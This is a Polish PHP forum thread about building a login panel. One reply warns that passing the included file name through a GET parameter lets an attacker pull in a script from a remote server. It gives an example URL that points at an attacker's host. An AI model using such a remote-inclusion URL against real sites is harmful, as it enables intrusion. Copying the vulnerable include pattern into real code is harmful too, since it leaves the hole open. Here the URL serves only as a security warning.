![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 9.01.2007 Ostrzeżenie: (0%) ![]() ![]() |
pisze forum oparte na php i mysql i chcialbym zrobic na nim cos w rodzaju panelu logowania tak jak to na przyklad jest na tym forum zrobione. W tej chwili konstrukcja mojego pliku index.php wygląda nastepujaco:
I spoko moge sie zalogowac.Tylko ze jakakolwiek akcja uruchamiajaca index.php wylogowuje mnie co zreszta jest do przewidzenia bo skrypt wykonuje sie od poczatku. Moje pytanie dotyczy tego czy da sie to jakos rozwiazac przy takim ukladzie index.php ktory zawiera dwa niezalezne includy i czy wogole da sie tak zrobic zeby odczytane przeze mnie przywileje uzytkownika byly globalnie widoczne ( na czas sesji uzytkownika- jest mi to potrzebne przy okreslaniu akcji jakie uzytkownik moze podejmowac). Chodzi mi o dokladnie taki sam panel logowania jak jest na tym forum. pozdrawiam i z gory dzieki za kazda sugestie |
|
|
![]() |
![]()
Post
#2
|
|
![]() Grupa: Zarejestrowani Postów: 51 Pomógł: 0 Dołączył: 29.12.2005 Skąd: Łódź Ostrzeżenie: (0%) ![]() ![]() |
Sugestia: twój kod to deser dla potencjalnego haxora.
w GET'cie trzymasz całą nazwę includowanego pliku? tzn index.php?nazwa2=page.php potencjalny haxor wpisze: index.php?nazwa2=http://serwerhaxora.pl/plik_pozwalajacy_mu_sie_wlamac.php i co wtedy ![]() zobacz to: Temat: Bezpieczenstwo skryptow php Co do logowania to najpierw popraw ten kod ^^ Ten post edytował Kamil J. 13.01.2007, 19:50:13 -------------------- Workspace: Ubuntu 8.04, PDT.
|
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 9.01.2007 Ostrzeżenie: (0%) ![]() ![]() |
tak wiem bezpieczenstwo jest bardzo wazne ale to blad jest do wyeliminowania. moim bole jest w tej chwili to jak zrobic dwa niezalezne includy tak zeby wywolanie jednego nie wywolywalo drugiego
luz poradzilem sobie dzieki zastosowaniu sesji uzytkownika :-) |
|
|
![]() ![]()
Post
#4
|
|
![]() Grupa: Zarejestrowani Postów: 51 Pomógł: 0 Dołączył: 29.12.2005 Skąd: Łódź Ostrzeżenie: (0%) ![]() ![]() |
Wytłumacz to jakoś dokładniej, bo w tym pierwszym poście to nic nie rozumiem.
Mówisz o jakiś przywilejach/logowaniach, a pokazujesz kod który jest odpowiedzialny na wyświetlenie danej treści. ocb? Pozdrawiam Kamil -------------------- Workspace: Ubuntu 8.04, PDT.
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 22.08.2025 - 00:36 |